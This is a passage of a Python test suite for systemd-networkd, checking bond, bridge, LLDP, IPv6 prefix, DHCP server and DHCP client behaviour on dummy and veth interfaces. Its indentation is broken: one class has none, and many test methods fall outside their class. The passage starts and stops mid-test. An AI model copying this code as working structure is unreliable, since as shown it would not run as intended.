        output = check_output('ip -d link show dummy98')
        print(output)
        self.assertRegex(output, 'SLAVE,UP,LOWER_UP')

        output = check_output('ip -d link show test1')
        print(output)
        self.assertRegex(output, 'SLAVE,UP,LOWER_UP')

        output = check_output('ip -d link show bond99')
        print(output)
        self.assertRegex(output, 'MASTER,UP,LOWER_UP')

        self.check_operstate('dummy98', 'enslaved')
        self.check_operstate('test1', 'enslaved')
        self.check_operstate('bond99', 'routable')

        # one slave down -> bond degrades
        check_output('ip link set dummy98 down')
        time.sleep(2)

        self.check_operstate('dummy98', 'off')
        self.check_operstate('test1', 'enslaved')
        self.check_operstate('bond99', 'degraded-carrier')

        # slave back up -> bond recovers
        check_output('ip link set dummy98 up')
        time.sleep(2)

        self.check_operstate('dummy98', 'enslaved')
        self.check_operstate('test1', 'enslaved')
        self.check_operstate('bond99', 'routable')

        # all slaves down
        check_output('ip link set dummy98 down')
        check_output('ip link set test1 down')
        time.sleep(2)

        self.check_operstate('dummy98', 'off')
        self.check_operstate('test1', 'off')

        # poll up to 30s for the kernel to drop the bond's carrier
        for trial in range(30):
            if trial > 0:
                time.sleep(1)

            output = check_output('ip address show bond99')
            print(output)

            if get_operstate('bond99') == 'no-carrier':
                break
        else:
            # Huh? Kernel does not recognize that all slave interfaces are down?
            # Let's confirm that networkd's operstate is consistent with ip's result.
            self.assertNotRegex(output, 'NO-CARRIER')
class NetworkdBridgeTests(unittest.TestCase, Utilities):
links = [
'bridge99',
'dummy98',
'test1']
units = [
'11-dummy.netdev',
'12-dummy.netdev',
'26-bridge.netdev',
'26-bridge-slave-interface-1.network',
'26-bridge-slave-interface-2.network',
'26-bridge-vlan-master.network',
'26-bridge-vlan-slave.network',
'bridge99-ignore-carrier-loss.network',
'bridge99.network']
routing_policy_rule_tables = ['100']
def setUp(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_bridge_vlan(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '26-bridge-vlan-slave.network',
'26-bridge.netdev', '26-bridge-vlan-master.network')
start_networkd()
self.wait_online(['test1:enslaved', 'bridge99:degraded'])
output = check_output('bridge vlan show dev test1')
print(output)
self.assertNotRegex(output, '4063')
for i in range(4064, 4095):
self.assertRegex(output, f'{i}')
self.assertNotRegex(output, '4095')
output = check_output('bridge vlan show dev bridge99')
print(output)
self.assertNotRegex(output, '4059')
for i in range(4060, 4095):
self.assertRegex(output, f'{i}')
self.assertNotRegex(output, '4095')
def test_bridge_property(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '12-dummy.netdev', '26-bridge.netdev',
'26-bridge-slave-interface-1.network', '26-bridge-slave-interface-2.network',
'bridge99.network')
start_networkd()
self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bridge99:routable'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, 'master')
self.assertRegex(output, 'bridge')
output = check_output('ip -d link show dummy98')
print(output)
self.assertRegex(output, 'master')
self.assertRegex(output, 'bridge')
output = check_output('ip addr show bridge99')
print(output)
self.assertRegex(output, '192.168.0.15/24')
output = check_output('bridge -d link show dummy98')
print(output)
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'path_cost'), '400')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'hairpin_mode'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_fast_leave'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'unicast_flood'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_flood'), '0')
# CONFIG_BRIDGE_IGMP_SNOOPING=y
if (os.path.exists('/sys/devices/virtual/net/bridge00/lower_dummy98/brport/multicast_to_unicast')):
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_to_unicast'), '1')
if (os.path.exists('/sys/devices/virtual/net/bridge99/lower_dummy98/brport/neigh_suppress')):
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'neigh_suppress'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'learning'), '0')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'priority'), '23')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'bpdu_guard'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'root_block'), '1')
output = check_output('bridge -d link show test1')
print(output)
self.assertEqual(read_bridge_port_attr('bridge99', 'test1', 'priority'), '0')
check_output('ip address add 192.168.0.16/24 dev bridge99')
time.sleep(1)
output = check_output('ip addr show bridge99')
print(output)
self.assertRegex(output, '192.168.0.16/24')
# for issue #6088
print('### ip -6 route list table all dev bridge99')
output = check_output('ip -6 route list table all dev bridge99')
print(output)
self.assertRegex(output, 'ff00::/8 table local metric 256 pref medium')
self.assertEqual(call('ip link del test1'), 0)
time.sleep(3)
self.check_operstate('bridge99', 'degraded-carrier')
check_output('ip link del dummy98')
time.sleep(3)
self.check_operstate('bridge99', 'no-carrier')
output = check_output('ip address show bridge99')
print(output)
self.assertRegex(output, 'NO-CARRIER')
self.assertNotRegex(output, '192.168.0.15/24')
self.assertNotRegex(output, '192.168.0.16/24')
print('### ip -6 route list table all dev bridge99')
output = check_output('ip -6 route list table all dev bridge99')
print(output)
self.assertRegex(output, 'ff00::/8 table local metric 256 (linkdown )?pref medium')
def test_bridge_ignore_carrier_loss(self):
    """Addresses on a bridge configured with IgnoreCarrierLoss= must survive removal of all ports."""
    copy_unit_to_networkd_unit_path('11-dummy.netdev', '12-dummy.netdev', '26-bridge.netdev',
                                    '26-bridge-slave-interface-1.network', '26-bridge-slave-interface-2.network',
                                    'bridge99-ignore-carrier-loss.network')
    start_networkd()
    self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bridge99:routable'])
    # Add a secondary address on top of the statically configured 192.168.0.15/24.
    check_output('ip address add 192.168.0.16/24 dev bridge99')
    time.sleep(1)
    # Delete both bridge ports; the bridge loses carrier.
    check_output('ip link del test1')
    check_output('ip link del dummy98')
    time.sleep(3)
    output = check_output('ip address show bridge99')
    print(output)
    # With IgnoreCarrierLoss= both addresses must be kept despite NO-CARRIER.
    self.assertRegex(output, 'NO-CARRIER')
    self.assertRegex(output, 'inet 192.168.0.15/24 brd 192.168.0.255 scope global bridge99')
    self.assertRegex(output, 'inet 192.168.0.16/24 scope global secondary bridge99')
def test_bridge_ignore_carrier_loss_frequent_loss_and_gain(self):
    """Rapidly flapping the only bridge port must not lose the bridge's address or policy rule."""
    copy_unit_to_networkd_unit_path('26-bridge.netdev', '26-bridge-slave-interface-1.network',
                                    'bridge99-ignore-carrier-loss.network')
    start_networkd()
    self.wait_online(['bridge99:no-carrier'])
    # Add/remove the port three times, leaving it in place on the last iteration.
    for trial in range(4):
        check_output('ip link add dummy98 type dummy')
        check_output('ip link set dummy98 up')
        if trial < 3:
            check_output('ip link del dummy98')
    self.wait_online(['bridge99:routable', 'dummy98:enslaved'])
    output = check_output('ip address show bridge99')
    print(output)
    self.assertRegex(output, 'inet 192.168.0.15/24 brd 192.168.0.255 scope global bridge99')
    # The routing policy rule configured by the .network file must also have survived.
    output = check_output('ip rule list table 100')
    print(output)
    self.assertEqual(output, '0: from all to 8.8.8.8 lookup 100')
class NetworkdLLDPTests(unittest.TestCase, Utilities):
    """Tests for LLDP emission and reception over a veth pair."""

    # Interfaces and unit files cleaned up between tests.
    links = ['veth99']
    units = [
        '23-emit-lldp.network',
        '24-lldp.network',
        '25-veth.netdev']

    def setUp(self):
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_lldp(self):
        """Each veth peer emits LLDP; `networkctl lldp` must show both as neighbors."""
        copy_unit_to_networkd_unit_path('23-emit-lldp.network', '24-lldp.network', '25-veth.netdev')
        start_networkd()
        self.wait_online(['veth99:degraded', 'veth-peer:degraded'])
        output = check_output(*networkctl_cmd, 'lldp', env=env)
        print(output)
        self.assertRegex(output, 'veth-peer')
        self.assertRegex(output, 'veth99')
class NetworkdRATests(unittest.TestCase, Utilities):
    """Tests for IPv6 Router Advertisement / prefix delegation."""

    links = ['veth99']
    units = [
        '25-veth.netdev',
        'ipv6-prefix.network',
        'ipv6-prefix-veth.network']

    def setUp(self):
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_ipv6_prefix_delegation(self):
        """The client side must pick up an address from the advertised 2002:da8:1:: prefix."""
        copy_unit_to_networkd_unit_path('25-veth.netdev', 'ipv6-prefix.network', 'ipv6-prefix-veth.network')
        start_networkd()
        self.wait_online(['veth99:routable', 'veth-peer:degraded'])
        output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
        print(output)
        self.assertRegex(output, '2002:da8:1:0')
class NetworkdDHCPServerTests(unittest.TestCase, Utilities):
    """Tests for networkd's built-in DHCPv4 server."""

    links = ['veth99']
    units = [
        '25-veth.netdev',
        'dhcp-client.network',
        'dhcp-client-timezone-router.network',
        'dhcp-server.network',
        'dhcp-server-timezone-router.network']

    def setUp(self):
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_dhcp_server(self):
        """A client on the peer must receive an address, gateway, DNS and NTP from the server."""
        copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-client.network', 'dhcp-server.network')
        start_networkd()
        self.wait_online(['veth99:routable', 'veth-peer:routable'])
        output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
        print(output)
        self.assertRegex(output, '192.168.5.*')
        self.assertRegex(output, 'Gateway: 192.168.5.1')
        self.assertRegex(output, 'DNS: 192.168.5.1')
        self.assertRegex(output, 'NTP: 192.168.5.1')

    def test_emit_router_timezone(self):
        """The server must emit the configured router option and timezone to the client."""
        copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-client-timezone-router.network', 'dhcp-server-timezone-router.network')
        start_networkd()
        self.wait_online(['veth99:routable', 'veth-peer:routable'])
        output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
        print(output)
        self.assertRegex(output, 'Gateway: 192.168.5.*')
        self.assertRegex(output, '192.168.5.*')
        self.assertRegex(output, 'Europe/Berlin')
class NetworkdDHCPClientTests(unittest.TestCase, Utilities):
    """Tests for networkd's DHCPv4/DHCPv6 client behavior against a dnsmasq server."""

    # Interfaces removed in setUp()/tearDown() so every test starts from a clean state.
    links = [
        'veth99',
        'vrf99']

    # Unit files removed from the networkd unit path in tearDown(). Kept sorted;
    # note: the duplicate 'dhcp-client-use-domains.network' entry was removed —
    # listing a unit twice only made tearDown() try to delete it a second time.
    units = [
        '25-veth.netdev',
        '25-vrf.netdev',
        '25-vrf.network',
        'dhcp-client-anonymize.network',
        'dhcp-client-decline.network',
        'dhcp-client-gateway-onlink-implicit.network',
        'dhcp-client-ipv4-dhcp-settings.network',
        'dhcp-client-ipv4-only-ipv6-disabled.network',
        'dhcp-client-ipv4-only.network',
        'dhcp-client-ipv6-only.network',
        'dhcp-client-ipv6-rapid-commit.network',
        'dhcp-client-keep-configuration-dhcp-on-stop.network',
        'dhcp-client-keep-configuration-dhcp.network',
        'dhcp-client-listen-port.network',
        'dhcp-client-reassign-static-routes-ipv4.network',
        'dhcp-client-reassign-static-routes-ipv6.network',
        'dhcp-client-route-metric.network',
        'dhcp-client-route-table.network',
        'dhcp-client-use-dns-ipv4-and-ra.network',
        'dhcp-client-use-dns-ipv4.network',
        'dhcp-client-use-dns-no.network',
        'dhcp-client-use-dns-yes.network',
        'dhcp-client-use-domains.network',
        'dhcp-client-use-routes-no.network',
        'dhcp-client-vrf.network',
        'dhcp-client-with-ipv4ll-fallback-with-dhcp-server.network',
        'dhcp-client-with-ipv4ll-fallback-without-dhcp-server.network',
        'dhcp-client-with-static-address.network',
        'dhcp-client.network',
        'dhcp-server-decline.network',
        'dhcp-server-veth-peer.network',
        'dhcp-v4-server-veth-peer.network',
        'static.network']

    def setUp(self):
        """Stop any leftover dnsmasq and networkd, and remove test links."""
        stop_dnsmasq(dnsmasq_pid_file)
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        """Clean up dnsmasq state (lease and log files), links, and unit files."""
        stop_dnsmasq(dnsmasq_pid_file)
        remove_lease_file()
        remove_log_file()
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)
def test_dhcp_client_ipv6_only(self):
    """A DHCPv6-only client must get a 2600:: address and no IPv4 lease."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, '2600::')
    self.assertNotRegex(output, '192.168.5')
    # Confirm that the IPv6 token is not set in the kernel.
    output = check_output('ip token show dev veth99')
    print(output)
    self.assertRegex(output, 'token :: dev veth99')
def test_dhcp_client_ipv4_only(self):
    """IPv4-only client: DNS servers from the lease get host routes, updated on renewal."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv4-only-ipv6-disabled.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(additional_options='--dhcp-option=option:dns-server,192.168.5.6,192.168.5.7', lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertNotRegex(output, '2600::')
    self.assertRegex(output, '192.168.5')
    self.assertRegex(output, '192.168.5.6')
    self.assertRegex(output, '192.168.5.7')
    # Checking routes to the DNS servers advertised in the lease.
    output = check_output('ip route show dev veth99')
    print(output)
    self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.181 metric 1024')
    self.assertRegex(output, r'192.168.5.6 proto dhcp scope link src 192.168.5.181 metric 1024')
    self.assertRegex(output, r'192.168.5.7 proto dhcp scope link src 192.168.5.181 metric 1024')
    # Restart dnsmasq with a changed DNS server set (.6 dropped, .8 added).
    stop_dnsmasq(dnsmasq_pid_file)
    start_dnsmasq(additional_options='--dhcp-option=option:dns-server,192.168.5.1,192.168.5.7,192.168.5.8', lease_time='2m')
    # Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120.
    print('Wait for the dynamic address to be renewed')
    time.sleep(125)
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertNotRegex(output, '2600::')
    self.assertRegex(output, '192.168.5')
    self.assertNotRegex(output, '192.168.5.6')
    self.assertRegex(output, '192.168.5.7')
    self.assertRegex(output, '192.168.5.8')
    # The route to the dropped DNS server must be gone; new ones must exist.
    output = check_output('ip route show dev veth99')
    print(output)
    self.assertNotRegex(output, r'192.168.5.6')
    self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.181 metric 1024')
    self.assertRegex(output, r'192.168.5.7 proto dhcp scope link src 192.168.5.181 metric 1024')
    self.assertRegex(output, r'192.168.5.8 proto dhcp scope link src 192.168.5.181 metric 1024')
def test_dhcp_client_ipv4_ipv6(self):
    """Dual-stack client: both a DHCPv4 and a DHCPv6 address must be acquired."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network',
                                    'dhcp-client-ipv4-only.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, '2600::')
    self.assertRegex(output, '192.168.5')
def test_dhcp_client_settings(self):
    """Client options (MAC, MTU, RouteTable=, vendor class, hostname) must be applied and sent."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv4-dhcp-settings.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    print('## ip address show dev veth99')
    output = check_output('ip address show dev veth99')
    print(output)
    # Configured MAC address, leased address, and MTU from the lease.
    self.assertRegex(output, '12:34:56:78:9a:bc')
    self.assertRegex(output, '192.168.5')
    self.assertRegex(output, '1492')
    print('## ip route show table main dev veth99')
    output = check_output('ip route show table main dev veth99')
    print(output)
    # See issue #8726.
    main_table_is_empty = output == ''
    if not main_table_is_empty:
        self.assertNotRegex(output, 'proto dhcp')
    print('## ip route show table 211 dev veth99')
    output = check_output('ip route show table 211 dev veth99')
    print(output)
    # RouteTable=211 moves the DHCP routes out of the main table.
    self.assertRegex(output, 'default via 192.168.5.1 proto dhcp')
    if main_table_is_empty:
        self.assertRegex(output, '192.168.5.0/24 proto dhcp')
    self.assertRegex(output, '192.168.5.0/24 via 192.168.5.5 proto dhcp')
    self.assertRegex(output, '192.168.5.1 proto dhcp scope link')
    print('## dnsmasq log')
    # Server side must have seen the client's vendor class, MAC, hostname, and MTU request.
    self.assertTrue(search_words_in_dnsmasq_log('vendor class: SusantVendorTest', True))
    self.assertTrue(search_words_in_dnsmasq_log('DHCPDISCOVER(veth-peer) 12:34:56:78:9a:bc'))
    self.assertTrue(search_words_in_dnsmasq_log('client provides name: test-hostname'))
    self.assertTrue(search_words_in_dnsmasq_log('26:mtu'))
def test_dhcp6_client_settings_rapidcommit_true(self):
    """With RapidCommit enabled (default), the DHCPv6 rapid-commit option must be sent."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99')
    print(output)
    self.assertRegex(output, '12:34:56:78:9a:bc')
    self.assertTrue(search_words_in_dnsmasq_log('14:rapid-commit', True))
def test_dhcp6_client_settings_rapidcommit_false(self):
    """With RapidCommit=no, the DHCPv6 rapid-commit option must not be sent."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-rapid-commit.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99')
    print(output)
    self.assertRegex(output, '12:34:56:78:9a:bc')
    self.assertFalse(search_words_in_dnsmasq_log('14:rapid-commit', True))
def test_dhcp_client_settings_anonymize(self):
    """Anonymize=yes must suppress identifying options (vendor class, hostname, MTU)."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-anonymize.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    self.assertFalse(search_words_in_dnsmasq_log('VendorClassIdentifier=SusantVendorTest', True))
    self.assertFalse(search_words_in_dnsmasq_log('test-hostname'))
    self.assertFalse(search_words_in_dnsmasq_log('26:mtu'))
def test_dhcp_client_listen_port(self):
    """ListenPort= must let the client obtain a lease from a server on a non-standard port."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-listen-port.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    # dnsmasq replies to client port 5555 instead of the default 68.
    start_dnsmasq('--dhcp-alternate-port=67,5555')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip -4 address show dev veth99')
    print(output)
    self.assertRegex(output, '192.168.5.* dynamic')
def test_dhcp_client_with_static_address(self):
    """A static address and a DHCP lease must coexist; DHCP routes use the dynamic source."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network',
                                    'dhcp-client-with-static-address.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    # The static address is primary; the DHCP address is added as secondary.
    self.assertRegex(output, r'inet 192.168.5.250/24 brd 192.168.5.255 scope global veth99')
    self.assertRegex(output, r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global secondary dynamic veth99')
    output = check_output('ip route show dev veth99')
    print(output)
    self.assertRegex(output, r'default via 192.168.5.1 proto dhcp src 192.168.5.[0-9]* metric 1024')
    self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.250')
    self.assertRegex(output, r'192.168.5.0/24 via 192.168.5.5 proto dhcp src 192.168.5.[0-9]* metric 1024')
    self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.[0-9]* metric 1024')
def test_dhcp_route_table_id(self):
    """RouteTable=12 must place DHCP-provided routes into table 12."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-route-table.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip route show table 12')
    print(output)
    self.assertRegex(output, 'veth99 proto dhcp')
    self.assertRegex(output, '192.168.5.1')
def test_dhcp_route_metric(self):
    """RouteMetric=24 must be applied to DHCP-provided routes."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-route-metric.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip route show dev veth99')
    print(output)
    self.assertRegex(output, 'metric 24')
def test_dhcp_client_reassign_static_routes_ipv4(self):
    """Statically configured IPv4 routes must be reinstalled after a DHCP lease renewal."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-reassign-static-routes-ipv4.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    output = check_output('ip route show dev veth99')
    print(output)
    self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.[0-9]*')
    self.assertRegex(output, r'192.168.5.0/24 proto static')
    self.assertRegex(output, r'192.168.6.0/24 proto static')
    self.assertRegex(output, r'192.168.7.0/24 proto static')
    # Force a different address on renewal by restricting the server's range.
    stop_dnsmasq(dnsmasq_pid_file)
    start_dnsmasq(ipv4_range='192.168.5.210,192.168.5.220', lease_time='2m')
    # Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120.
    print('Wait for the dynamic address to be renewed')
    time.sleep(125)
    self.wait_online(['veth99:routable'])
    output = check_output('ip route show dev veth99')
    print(output)
    # The static routes must still be present after renewal.
    self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.[0-9]*')
    self.assertRegex(output, r'192.168.5.0/24 proto static')
    self.assertRegex(output, r'192.168.6.0/24 proto static')
    self.assertRegex(output, r'192.168.7.0/24 proto static')
def test_dhcp_client_reassign_static_routes_ipv6(self):
    """Statically configured IPv6 routes must be reinstalled after a DHCPv6 lease renewal."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-reassign-static-routes-ipv6.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'inet6 2600::[0-9a-f]*/128 scope global (noprefixroute dynamic|dynamic noprefixroute)')
    output = check_output('ip -6 route show dev veth99')
    print(output)
    self.assertRegex(output, r'2600::/64 proto ra metric 1024')
    self.assertRegex(output, r'2600:0:0:1::/64 proto static metric 1024 pref medium')
    # Force renewal from a different IPv6 range.
    stop_dnsmasq(dnsmasq_pid_file)
    start_dnsmasq(ipv6_range='2600::30,2600::40', lease_time='2m')
    # Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120.
    print('Wait for the dynamic address to be renewed')
    time.sleep(125)
    self.wait_online(['veth99:routable'])
    output = check_output('ip -6 route show dev veth99')
    print(output)
    # The static route must still be present after renewal.
    self.assertRegex(output, r'2600::/64 proto ra metric 1024')
    self.assertRegex(output, r'2600:0:0:1::/64 proto static metric 1024 pref medium')
def test_dhcp_keep_configuration_dhcp(self):
    """KeepConfiguration=dhcp: the lease address survives expiry, networkd stop, and restart."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-keep-configuration-dhcp.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    # Stopping dnsmasq so networkd won't be able to renew the DHCP lease.
    stop_dnsmasq(dnsmasq_pid_file)
    # Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120.
    print('Wait for the dynamic address to be expired')
    time.sleep(125)
    print('The lease address should be kept after lease expired')
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    check_output('systemctl stop systemd-networkd')
    print('The lease address should be kept after networkd stopped')
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    start_networkd(3)
    self.wait_online(['veth-peer:routable'])
    print('Still the lease address should be kept after networkd restarted')
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, r'192.168.5.*')
def test_dhcp_keep_configuration_dhcp_on_stop(self):
    """KeepConfiguration=dhcp-on-stop: address kept while networkd is stopped, dropped on restart."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-keep-configuration-dhcp-on-stop.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    stop_dnsmasq(dnsmasq_pid_file)
    check_output('systemctl stop systemd-networkd')
    # While networkd is stopped the lease address must remain.
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, r'192.168.5.*')
    restart_networkd(3)
    self.wait_online(['veth-peer:routable'])
    # After restart (server gone), the address must be released.
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertNotRegex(output, r'192.168.5.*')
def test_dhcp_client_reuse_address_as_static(self):
    """Addresses obtained via DHCP can be re-declared statically without conflict."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    output = check_output('ip address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, '192.168.5')
    self.assertRegex(output, '2600::')
    # Capture the leased addresses and generate a static .network file reusing them.
    ipv4_address = re.search(r'192.168.5.[0-9]*/24', output)
    ipv6_address = re.search(r'2600::[0-9a-f:]*/128', output)
    static_network = '\n'.join(['[Match]', 'Name=veth99', '[Network]', 'IPv6AcceptRA=no', 'Address=' + ipv4_address.group(), 'Address=' + ipv6_address.group()])
    print(static_network)
    remove_unit_from_networkd_path(['dhcp-client.network'])
    with open(os.path.join(network_unit_file_path, 'static.network'), mode='w') as f:
        f.write(static_network)
    # When networkd started, the links are already configured, so let's wait for 5 seconds
    # for the links to be re-configured.
    restart_networkd(5)
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The same addresses must now be present as permanent (no lifetime) addresses.
